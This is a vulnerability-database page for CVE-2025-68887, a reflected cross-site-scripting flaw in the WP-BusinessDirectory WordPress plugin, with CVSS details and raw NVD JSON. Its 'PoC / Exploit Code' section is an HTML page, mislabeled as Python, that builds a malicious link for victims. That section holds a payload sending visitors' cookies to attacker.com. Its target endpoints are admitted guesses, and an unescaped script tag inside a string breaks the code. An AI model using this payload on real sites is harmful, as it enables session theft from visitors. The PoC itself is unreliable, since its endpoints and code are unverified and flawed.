Security Vulnerability Report
中文
CVE-2025-68887 CVSS 7.1 HIGH

CVE-2025-68887

Published: 2026-01-08 10:15:54
Last Modified: 2026-04-15 00:35:42

Description

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in CMSJunkie - WordPress Business Directory Plugins WP-BusinessDirectory wp-businessdirectory allows Reflected XSS.This issue affects WP-BusinessDirectory: from n/a through <= 4.0.1.

CVSS Details

CVSS Score
7.1
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

WP-BusinessDirectory <= 4.0.1
可能影响更低版本 (需参考具体插件版本历史)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- CVE-2025-68887 PoC - Reflected XSS in WP-BusinessDirectory --> <!-- Target: WordPress WP-BusinessDirectory Plugin <= 4.0.1 --> <!-- Attack Vector: Malicious URL parameter injection --> <!DOCTYPE html> <html> <head> <title>CVE-2025-68887 PoC</title> </head> <body> <h1>CVE-2025-68887: WP-BusinessDirectory Reflected XSS PoC</h1> <p>Target: WordPress site with WP-BusinessDirectory plugin <= 4.0.1</p> <h2>Attack URL (malicious link to send to victim):</h2> <pre id="malicious-url"></pre> <h2>JavaScript Payload:</h2> <pre> <script>alert('XSS Vulnerability - CVE-2025-68887'); document.location='https://attacker.com/steal?cookie='+document.cookie;</script> </pre> <script> // Generate malicious URL based on common WP-BusinessDirectory endpoints var baseUrl = window.location.origin + '/wp-admin/admin-ajax.php'; var maliciousPayload = '<script>alert("XSS CVE-2025-68887")</script>'; var maliciousUrl = baseUrl + '?action=wbd_search&q=' + encodeURIComponent(maliciousPayload); document.getElementById('malicious-url').textContent = maliciousUrl; // Alternative attack vectors (commented out) // var searchUrl = '/?s=' + encodeURIComponent(maliciousPayload); // var categoryUrl = '/?wbd_category=' + encodeURIComponent(maliciousPayload); // var listingUrl = '/?listing_id=' + encodeURIComponent(maliciousPayload); </script> <p><strong>Note:</strong> This PoC is for educational and authorized testing purposes only.</p> </body> </html>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-68887", "sourceIdentifier": "[email protected]", "published": "2026-01-08T10:15:53.950", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in CMSJunkie - WordPress Business Directory Plugins WP-BusinessDirectory wp-businessdirectory allows Reflected XSS.This issue affects WP-BusinessDirectory: from n/a through <= 4.0.1."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 3.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/wp-businessdirectory/vulnerability/wordpress-wp-businessdirectory-plugin-3-1-3-cross-site-scripting-xss-vulnerability?_s_id=cve", "source": "[email protected]"}]}}